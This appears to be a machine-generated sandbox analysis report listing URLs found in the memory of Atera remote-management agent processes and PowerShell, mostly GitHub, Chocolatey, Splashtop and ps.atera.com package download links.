                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin8-binaries/releases/download/jdk8u422-b05/OpenJDK8U-jre_x86-32_wi
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin8-binaries/releases/download/jdk8u432-b06/OpenJDK8U-jre_x64_windo
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ajshastri/chocolatey-packages
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ajshastri/chocolatey-packages/tree/master/corretto-jre-8
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/asciidoctor/asciidoctorj
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/asciidoctor/asciidoctorj/issues
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/bell-sw/Liberica
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/bell-sw/Liberica/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/bell-sw/Liberica/issues
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/bell-sw/Liberica/releases/download/17.0.13
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/bell-sw/LibericanJDK
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE542000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/chocolatey/chocolatey-coreteampackages
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/corretto
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/corretto/corretto-8/blob/develop/LICENSE
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf8
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e3958
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e39588
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, Microsoft.Extensions.Configuration.Abstractions.dll0.26.dr, Microsoft.Extensions.Configuration.dll0.26.dr, Microsoft.Extensions.FileProviders.Abstractions.dll0.26.drString found in binary or memory: https://github.com/dotnet/runtime
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/flcdrg/au-packages/tree/master/TeamCity-PreinstalledJRE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/flcdrg/au-packages/tree/master/teamcity
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/flyway/flyway
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/flyway/flyway/issues
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/geraldcombs/chocolatey-packages
                                Source: AteraAgent.exe, 0000000D.00000002.2387388686.0000021C5B7C2000.00000002.00000001.01000000.0000002C.sdmpString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/johanjanssen/AdoptOpenJDKChocolateyPackages
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/johanjanssen/ChocolateyPackages/tree/master/AdoptOpenJDKJRE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/johanjanssen/ChocolateyPackages/tree/master/OpenJDK11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/johanjanssen/ChocolateyPackages/tree/master/OpenJDK8
                                Source: AgentPackageInternalPoller.exe, 0000002F.00000002.2469228610.0000022B9B262000.00000002.00000001.01000000.0000003B.sdmpString found in binary or memory: https://github.com/lextudio/sharpsnmplib.git
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/nlog/NLog/wiki/Configuration-file#variables
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/nlog/NLog/wiki/Layout-Renderers
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/nlog/NLog/wiki/Targets
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/nlog/nlog/wiki/Configuration-file
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/openjdk/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/proudcanadianeh/ChocoPackages/tree/master/javaruntime
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/proudcanadianeh/ChocoPackages/tree/master/jre8/master
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/proudcanadianeh/ChocoPackages/tree/master/jre8/master)
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/rgra/choco-packages/tree/master/server-jre
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/rgra/choco-packages/tree/master/server-jre10
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/rgra/choco-packages/tree/master/server-jre8
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4E7C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2059219762.0000022F4D8E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://josm.openstreetmap.de/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://josm.openstreetmap.de/browser/josm/trunk
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://josm.openstreetmap.de/browser/trunk/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://josm.openstreetmap.de/download/windows/josm-setup-19265-java21.exe
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://josm.openstreetmap.de/report
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://josm.openstreetmap.de/wiki/Changelog
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://josm.openstreetmap.de/wiki/Help
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lists.openstreetmap.org/listinfo/josm-dev
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.splashtop.com
                                Source: AgentPackageSTRemote.exe, 00000021.00000000.2019302027.000002EF73BC2000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: https://my.splashtop.com/csrs/win
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2125875531.000001F735E48000.00000002.00000001.01000000.00000024.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: https://nlog-project.org/
                                Source: powershell.exe, 0000001F.00000002.2124156112.0000022F5CAF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/BitDefender/rmm.zip
                                Source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A88F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric
                                Source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric/MSI/1.8.7.2/Setupx64.msi
                                Source: AgentPackageUpgradeAgent.exe, 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric/MacAgent/1.0/AteraAgentInstaller.pkgA/
                                Source: AgentPackageUpgradeAgent.exe, 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric5Get
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C429FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C429EC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/a
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/ag
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.16/AgentPackageA
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.16/AgentPackageAg
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A83000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4284E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.16/AgentPackageAgentI
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.16/AgentPackageAgepTS
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageMonitoring/0.5/AgentPackageMonitoring.zi
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.8/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B9E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.8/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.Availability/0.16/Agent.Package.Availability.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.Watchdog/2.0/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A83000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4284E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageAgentInformation/38.8/AgentPackageAgentInformation
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/38.1/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B9E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/38.1/AgentPackageMonitoring.ziph
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageNetworkDiscovery/13.0/AgentPackageNetworkDiscovery
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageRuntimeInstaller/1.5/AgentPackageRuntimeInstaller.
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/24.3/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B9E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/24.3/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageTaskScheduler/13.0/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesne
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Availability/0.16/Agent.Package.Availability.z
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/2.0/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/2.0/Agent.Package.Watchdog.zip?0YJRFk
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zip?0YJRFk/JQU
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageAgentInformation/38.8/AgentPackageAgentInformati
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zip?0YJRFk
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageInternalPoller/23.8/AgentPackageInternalPoller.z
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip?0YJR
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/38.1/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/38.1/AgentPackageMonitoring.zip?0YJRF
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B9E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/38.1/AgentPackageMonitoring.ziph
